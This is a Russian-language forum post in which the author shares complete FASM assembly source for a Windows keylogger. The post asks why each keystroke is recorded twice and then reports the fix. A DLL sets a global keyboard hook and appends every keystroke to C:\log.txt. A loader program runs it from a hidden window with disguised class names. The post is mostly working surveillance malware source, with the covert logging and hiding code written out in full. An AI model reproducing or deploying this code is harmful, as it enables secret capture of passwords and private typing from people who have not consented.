Здраствуйте. попробовал написать простой кейлоггер, который все нажатия клавиш записывает в C:\log.txt Если у вас есть свободное время - подскажите, пожалуйста, почему он каждую клавишу пишет два раза? вот исходник: libastral.dll: Код (Text): format PE GUI 4.0 DLL entry KLogEntry include '%fasminc%\win32a.inc' section '.data' data readable writeable hInstance dd ? NumWritten dd ? hFile dd ? chchch db ? LogFile db 'C:\log.txt',0 CrLf db 0Dh,0Ah _ks rb 256 w dd ? section '.bss' data readable writeable shareable hHook dd ? section '.code' code readable writeable executable proc KLogEntry hInst, reason, reserved1 cmp [reason],DLL_PROCESS_ATTACH jne .finish push [hInst] pop [hInstance] .finish: ret endp proc InstallHook invoke SetWindowsHookEx,WH_KEYBOARD,NKLogProc,[hInstance],0 mov [hHook],eax ret endp proc UninstallHook invoke UnhookWindowsHookEx,[hHook] ret endp proc NKLogProc nCode, wParam, lParam test [lParam],40000000 jz .nologkey cmp [nCode],HC_ACTION jne .nologkey cmp word [wParam],VK_SPACE je .logkey cmp word [wParam],VK_RETURN je .logkey cmp [wParam],2Fh jb .nologkey cmp [wParam],100h jbe .logkey jmp .nologkey .logkey: invoke CreateFile,LogFile,GENERIC_READ or GENERIC_WRITE,0,0,OPEN_ALWAYS,0,0 mov [hFile],eax invoke SetFilePointer,[hFile],0,0,FILE_END cmp word [wParam],VK_RETURN jne .noenter invoke WriteFile,[hFile],CrLf,2,NumWritten,0 jmp .finish .noenter: invoke GetKeyboardState,_ks mov [NumWritten],0 invoke ToAscii,[wParam],[NumWritten],_ks,w,0 mov al,byte [w] mov [chchch],al invoke WriteFile,[hFile],chchch,1,NumWritten,0 .finish: invoke CloseHandle,[hFile] .nologkey: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp section '.idata' import data readable writeable library user32,'user32.dll',\ kernel32,'kernel32.dll' include '%fasminc%\api\user32.inc' include '%fasminc%\api\kernel32.inc' section '.edata' export data readable writeable export 'libastral.dll',\ InstallHook,'InstallHook',\ UninstallHook,'UninstallHook',\ NKLogProc,'NKLogProc' section '.reloc' fixups data readable discardable NKeyLogger.exe: Код (Text): format PE GUI 4.0 entry start include '%fasminc%\win32a.inc' section '.data' data readable writeable LibName db 'libastral.dll',0 CFileName db 'C:\ntldr.zza',0 wc WNDCLASSEX ClassName db '##NK##',0 AppName db '$$NK$$',0 hwnd dd ? msg MSG hTimer dd ? hFile dd ? hLib dd ? section '.code' code readable writeable executable start: invoke FindWindow,ClassName,AppName test eax,eax jnz .klir invoke GetModuleHandle,0 mov [wc.hInstance],eax mov [wc.cbSize],sizeof.WNDCLASSEX mov [wc.style],CS_HREDRAW or CS_VREDRAW mov [wc.lpfnWndProc],WndProc mov [wc.cbClsExtra],0 mov [wc.cbWndExtra],0 mov [wc.hbrBackground],COLOR_WINDOW+1 mov [wc.lpszClassName],ClassName mov [wc.lpszMenuName],0 invoke LoadIcon,0,IDI_APPLICATION mov [wc.hIcon],eax mov [wc.hIconSm],eax invoke LoadCursor,0,IDC_ARROW mov [wc.hCursor],eax invoke RegisterClassEx,wc invoke CreateWindowEx,0,ClassName,AppName,0,0,0,0,0,0,0,[wc.hInstance],0 mov [hwnd],eax invoke ShowWindow,eax,SW_HIDE invoke UpdateWindow,[hwnd] @@: invoke GetMessage,msg,0,0,0 test eax,eax jz @f invoke TranslateMessage,msg invoke DispatchMessage,msg jmp @b @@: mov eax,[msg.wParam] .klir: invoke ExitProcess,0 proc WndProc hWnd, uMsg, wParam, lParam cmp [uMsg],WM_CREATE je .wmcreate cmp [uMsg],WM_DESTROY je .wmdestroy invoke DefWindowProc,[hWnd],[uMsg],[wParam],[lParam] ret .wmcreate: call [InstallHook] jmp .finish .wmdestroy: call [UninstallHook] invoke PostQuitMessage,0 jmp .finish .finish: xor eax,eax ret endp section '.idata' import data readable writeable library user32,'user32.dll',\ kernel32,'kernel32.dll',\ libastral,'libastral.dll' include '%fasminc%\api\user32.inc' include '%fasminc%\api\kernel32.inc' import libastral,\ InstallHook,'InstallHook',\ UninstallHook,'UninstallHook'
уже около 4 часа ищу ошибку... наконец-то нашел сам %). я всего лишь вместо "test [lParam],40000000h" написал "test [lParam],4000000" Как же я ненавижу такие ошибки...
